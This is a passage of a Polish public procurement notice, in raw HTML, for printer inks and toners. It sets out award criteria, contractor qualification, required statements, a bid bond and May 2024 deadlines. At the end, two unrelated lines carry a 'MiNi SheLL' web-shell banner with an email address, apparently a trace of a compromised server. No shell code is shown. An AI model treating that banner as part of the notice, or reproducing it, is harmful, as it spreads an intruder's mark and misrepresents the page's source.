C13T00S34A	65 ml	3 szt.<br/>TUSZ/ATRAMENT SUBLIMACYJNY DO EPSON L1210 YELLOW 65 ML	C13T00S44A	65 ml	3 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30192113-6 - Wkłady drukujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy od dnia dostarczenia jednostkowego zlecenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych wykonał minimum jedną umowę, której przedmiotem zamówienia była dostawa materiałów eksploatacyjnych do urządzeń drukujących, <br/>a wartość umowy nie była mniejsza niż 150.000,00 zł brutto.<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu, kwoty będą wyrażane w walucie obcej, to kwoty te zostaną przeliczone przez Zamawiającego na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanych przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Informacje w tym zakresie należy przedstawić zgodnie <br/>z załącznikiem nr 7 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. <br/>poz. 369), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz dostaw, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych<br/> są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzając ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a)	Wykonawca, który powołuje się na rozwiązania równoważne do opisywanych przez Zamawiającego produktów jest obowiązany wykazać dla każdej pozycji oferowanych materiałów równoważnych, że oferowany przez niego przedmiot dostawy spełnia wymagania określone przez Zamawiającego. Dla potwierdzenia zgodności oferowanych produktów z wymaganiami Zamawiającego Wykonawca przedstawi raporty z testów wydajności wystawione przez podmioty posiadające akredytację udzieloną przez Polskie Centrum Akredytacji lub przez inne równoważne jednostki oceniające zgodność, informujące o wydajności produktów przetestowanych zgodnie z normą:<br/>ISO/IEC 19752 – norma pomiarów wydajności dla kaset z tonerem do monochromatycznych drukarek laserowych oraz do komponentów drukujących <br/>w dowolnym urządzeniu wielofunkcyjnym, które posiada cyfrową ścieżkę wydruku (np. wielofunkcyjne urządzenie posiadające komponenty drukarkowe); <br/>ISO/IEC 19798 – norma pomiarów wydajności dla kaset z tonerem do kolorowych drukarek laserowych oraz komponentów drukujących w dowolnym urządzeniu wielofunkcyjnym, które posiada cyfrową ścieżkę wydruku (np. wielofunkcyjne urządzenie posiadające komponenty drukarkowe); <br/>ISO/IEC 24711 – norma pomiarów wydajności dla kolorowych kartridży atramentowych oraz do komponentów drukujących w dowolnym urządzeniu wielofunkcyjnym, które posiada cyfrową ścieżkę wydruku (np. wielofunkcyjne urządzenie posiadające komponenty drukarkowe); <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający dopuszcza w postępowaniu uzupełnienie przedmiotowych środków dowodowych. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych wskazanych lub złożone przedmiotowe środki dowodowe będą niekompletne Zamawiający wezwie Wykonawcę do ich uzupełnienia w wyznaczonym terminie <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	wypełnionego formularza elektronicznego dostępnego i generowanego przez Platformę;<br/>2)	formularza ofertowego (dołączonego obowiązkowo do formularza elektronicznego platformie) – zgodnie z załącznikiem nr 1 do SWZ; <br/>3) w przypadku, gdy oferta zawiera tajemnice przedsiębiorstwa – dowodów – zgodnie <br/> z zapisami ust. 6;<br/>4) w przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby:<br/>a)	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>Wzór oświadczenia stanowi załącznik nr 8 do SWZ. <br/>Zobowiązanie podmiotu udostepniającego zasoby musi być podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>b)	oświadczenie podmiotu udostępniającego zasoby aktualne na dzień składania ofert o braku podstaw wykluczenia i spełnianiu warunków udziału <br/>w postępowaniu zgodnie z załącznikiem nr 4 do SWZ oraz załącznikiem nr 5 do SWZ.<br/>5)	pełnomocnictwa złożonego w formie opisanej w pkt. 8 (jeżeli dotyczy);<br/>6)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku składania oferty przez spółkę cywilną zamiast pełnomocnictwa Wykonawca może złożyć umowę spółki cywilnej z której w sposób jednoznaczny wynikać będzie sposób reprezentacji spółki cywilnej.<br/>7) oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu. Wzór oświadczenia stanowi załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu składa każdy z Wykonawców;<br/>8)	oświadczenia Wykonawcy o niepodleganiu wykluczeniu z postępowania. Wzór oświadczenia stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców;<br/>9)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>o którym mowa w art. 117 ust. 4 ustawy Pzp. Wzór oświadczenia stanowi załącznik nr 9 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 4.000,00 zł-(cztery tysiące złotych).<br/>2.	Zgodnie z art. 97 ust. 7 pkt 2-4 ustawy Pzp wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 62 1130 1017 0020 1546 2290 0001 w Bank Gospodarstwa Krajowego w Warszawie <br/>z dopiskiem „wadium w postępowaniu Nr sprawy: ASzWoj-PK.ZZP.261.8.2024”. Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez Zamawiającego nastąpi przed upływem terminu składania ofert).<br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa <br/>w art. 97 ust. 7 pkt 2-4 ustawy Pzp, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, <br/>o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną <br/>w postępowaniu o udzielenie zamówienia publicznego - „Dostawę materiałów eksploatacyjnych do urządzeń drukujących” Nr sprawy: ASzWoj-PK-ZZP.261.8.2024.<br/>6.	Za zgodą Zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub kilka form, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp. Zmiana formy wadium musi być dokonana z zachowaniem ciągłości zabezpieczenia oferty kwotą wadium. <br/>7.	Zgodnie z art. 96 ust. 6 ustawy Pzp, Zamawiający zatrzymuje wadium wraz z odsetkami, <br/>a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp, występuje odpowiednio do gwaranta lub poręczyciela <br/>z żądaniem zapłaty wadium, jeżeli:<br/>1)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub <br/>art. 128 ust. 1 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/>2)	wykonawca, którego oferta została wybrana:<br/>a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe <br/>z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana.<br/>8.	Z treści gwarancji i poręczeń, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie zamawiającego, zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz zamawiającego kwoty określonej w gwarancji lub poręczeniu, w okolicznościach, o których mowa w art. 98 <br/>ust. 6 ustawy Pzp, <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy wspólnie ubiegający się o udzielenia zamówienie (konsorcja i spółki cywilne) ustanawiają pełnomocnika do reprezentowania ich w postepowaniu albo reprezentowania w postepowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenia zamówienie w odniesieniu do warunków udziału w postępowaniu, którzy polegają na zdolnościach tych wykonawców, do realizacji których te zdolności są wymagane dołączają do oferty załącznik nr 9 do SWZ - oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika które dostawy wykonają poszczególni Wykonawcy.<br/>3)	Podpisy na pełnomocnictwie, o którym mowa w ust. 4 pkt 5 i ust. 8 musza być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawców. Dokument pełnomocnictwa winien zostać złożony w formie oryginału lub kopii poświadczonej notarialnie. Podpisy <br/>i poświadczenie ze zgodność z oryginałem złożone muszą być za pomocą kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy określa na jakich podstawach Zamawiający umożliwia zmiany umowy w sprawie realizacji zamówienia publicznego- załącznik nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym bądź podpisem osobistym za pośrednictwem Platformy pod adresem: https://akademia-mil.ezamawiajacy.pl/servlet/HomeServle</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com